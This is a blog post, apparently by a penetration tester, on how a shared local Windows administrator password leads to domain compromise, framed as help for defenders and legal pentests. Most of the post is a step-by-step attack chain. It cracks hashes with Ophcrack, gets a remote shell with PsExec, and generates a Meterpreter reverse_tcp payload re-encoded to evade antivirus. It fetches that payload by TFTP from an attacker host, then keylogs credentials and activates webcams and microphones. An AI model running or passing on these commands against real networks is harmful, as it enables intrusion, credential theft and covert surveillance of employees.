The ‘Local Administrator’ account on a Windows workstation is one of the most scariest of all accounts. Not ‘scary’ as in it has more privileges than other accounts (Domain Administrator, NT Authority\System etc.) But ‘scary’ in the fact it is often overlooked by System Administrators as being a huge security risk. The ‘risk’ of this account is that more often than not, every computer in a given network will have the same local administrator account. (Usually due to standardisation and SOE imaging throughout the company)
“So what? The local admin account on our network won’t get you any network resources. Every user’s profile on the domain is stored on the server, nothing is local and everything has correct access permissions. Even If an attacker got this password and logged in to a machine, they can’t do anything (and good luck installing a keylogger or some malware – we have Anti Virus!” – I hear some of you System Admins saying.
Not true. Not true at all. The local admin account, if an attacker can get it, is a very valuable and damaging weapon. In this post I will point out ways that an attacker can not only obtain the local admin account/password for a given network environment, but how they use it to penetrate your entire Windows Domain, gaining domain credentials along the way. (I previously wrote a post about a disgruntled IT employee using local admin to pilfer his bosses bank account)
Keep in mind, this post isn’t a tutorial, but detailed concepts which should give you enough information to defend against such attacks, or perform them on legal penetration tests.
How does one obtain this magical local admin account?
Sitting inside of the Firewall:
Say you have a disgruntled employee sitting at their terminal. Or perhaps you are a pentester working inside of the network, or even if you are an attacker who walked into the building and jacked into a data outlet or jumped onboard a wifi connection.
Method 1: Boot the computer with the Ophcrack DVD/USB. Ophcrack will automatically load the hashes from the local system, and start cracking them using stored Rainbow Tables. http://ophcrack.sourceforge.net/
The Rainbow tables stored on the Ophcrack image are quite good. Most user passwords will be cracked unless the owner of the system has used proper/strong password practises. (example: long and totally random characters/letters/numbers).
Method 2: Boot into a Live Linux environment (similar to above) but copy the hashes to a disk, take that home and run it through another password cracker or Brute Forcer (JTR, Cain, RCrack). You could generate your own Rainbow tables which are larger than the one supplied with Ophcrack. You can also use your graphics card with CUDA (if it is supported) to greatly speed up this process. You could even use a ‘distributed computing’ type cracker (provided you have enough computers at your disposal).
Outside of the Firewall:
Method 1: Social Engineering. The possibilities are endless here.
There are also techniques to change the local administrator password without knowing it, but that is not a particular concern for this article. Also, everything seen below can be performed using the ‘pass the hash technique’, meaning that you do not need to KNOW the local admin password, you just have to be on a compromised machine first, and dump the hashes. (This would have to be performed in conjunction with an exploit or local privilege escalation techniques.)
So what are the dangers once the password has been compromised?
- Capturing the keystrokes and passwords (personal and business) for the Finance Director
- Bugging the CEOs laptop to record audio from the microphone while he is in a confidential meeting
- Getting access to the IT manager’s emails and sending out targeted phishing campaigns against select individuals
- Obtaining the Domain Administrator’s account and dumping the entire Active Directory SAM databse of users and cracking the passwords
- And so on… and so fourth. As you can see, an attacker can do almost anything within a typical network, all by having the Local Admin password.
I will give you a second to now change your Local Admin password. Once you have done that, continue reading
All this starts with NetBIOS. If an attacker can talk to the another Windows machine on the network using RPC, and has correct credentials to authenticate, then the rest falls in to place. A standard Windows Firewall could prevent this. But in most typical networks, the Windows Firewall will either be disabled for staff PCs, or if it is enabled – will allow traffic from trusted sources (the internal subnet).
net use \\V.I.C.T.I.M “admin-password” /u:hostname\administrator
(You can get the hostname by doing an NSLOOKUP of the IP Address. V.I.C.T.I.M indicates IP address of the victim’s computer. You could find this by running a ping sweep or port scan across the network)
(If this completes successfully, you now have local admin access to that computer (so to speak))
Next, we use PSExec.exe to run a file on the target machine. One thing to note is that if the file does not exist on the target machine and PSExec is set to copy the file, the user will get a popup message – which isn’t good. But that’s fine, because all we want to run is cmd.exe (which exists).
PsExec.exe \\V.I.C.T.I.M -u hostname\administrator -p “admin-password” cmd.exe
This will now give you a CMD Shell on the target’s machine with local administrator permissions. NICE!
Now what? Well, being the hacker/pentester you are… you will probably be running BackTrack. Drop into Metasploit and generate a Meterpreter Payload which will use reverse_tcp to connect back to your BackTrack distribution. (Virtualbox could be installed on a workstation with local admin permissions and BackTrack can be installed inside of this, getting an IP address from the DHCP pool).
I have found that the default Meterpreter payload does not get detected by many Anti Virus products as of the time of this post (which is insane). If the company’s AV product does detect this payload, run it through Shikata_gai_nai 10 times – That seems to do the trick on most occasions.)
./msfpayload windows/meterpreter/reverse_tcp LHOST=A.T.T.A.C.K.E.R x > /tftp/payload.exe
So we have the Metasploit payload ready and sitting in a newly created folder called /tftp. We just need to get it onto the target machine (where we already have command shell access).
Enable the TFTP deamon on Backtrack and set the root directory to /tftp
in.tftp –daemon /tftp
You will now want to open Metasploit and set it to listen for incoming connections from when the payload is executed.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST A.T.T.A.C.K.E.R (the IP address of your BackTrack machine. You would have included this when you generated your payload)
Back on the victims machine.
tftp –i A.T.T.A.C.K.E.R GET payload.exe
(the –i is very important here. It is for transferring binary files. If you do not include this, the .exe will not work).
This copies the payload to the victim’s PC. If this fails, Anti Virus might have picked it up. But you would have tested this before you sent it out? Right?
Now the payload is on the victim’s machine. We just need to run it. We can do this back on our machine through PSExec.
PsExec.exe \\V.I.C.T.I.M -u hostname\administrator -p “admin-password” c:\payload.exe
(I found it is better to have the payload in the C: drive to make sure it doesn’t get mangled in Windows Profiles)
This should now give you a Meterpreter shell in Metasploit!
From here you can attempt to get system privileges (getsystem) and migrate to the winlogon process and start the keylogger. When a user then unlocks the workstation, credentials will be captured. What is more fun is migrating to the explorer process and starting the keylogger (keyscan_start). This will capture everything typed on the computer (apart from the logon screen). So if this was an IT personnel’s computer, or support desk, you would be able to capture the server credentials as they logged in to the servers, or an employee doing Internet Banking, or any range of highly sensitive and damaging secrets.
With Meterpreter, you can also turn on the victim’s microphone and webcam (this reminds me of the good old Sub Seven days). You can even pivot around to other computers, capturing credentials and pilfering sensitive information. Once you have a Meterpreter shell on a box with system privileges… It’s game over.
I won’t go into specific details on working with Meterpreter as it is so vast. It’s best you read The Metasploit Unleashed Tutorial and play around with it.
The power and dangers of this tool is great. It can either make your life as a pentester easy, or it could make your life as a System Admin hell. It can be run across your network in most cases just by the attacker knowing the local admin password for your systems, relying on the fact that most AV systems these days are weak.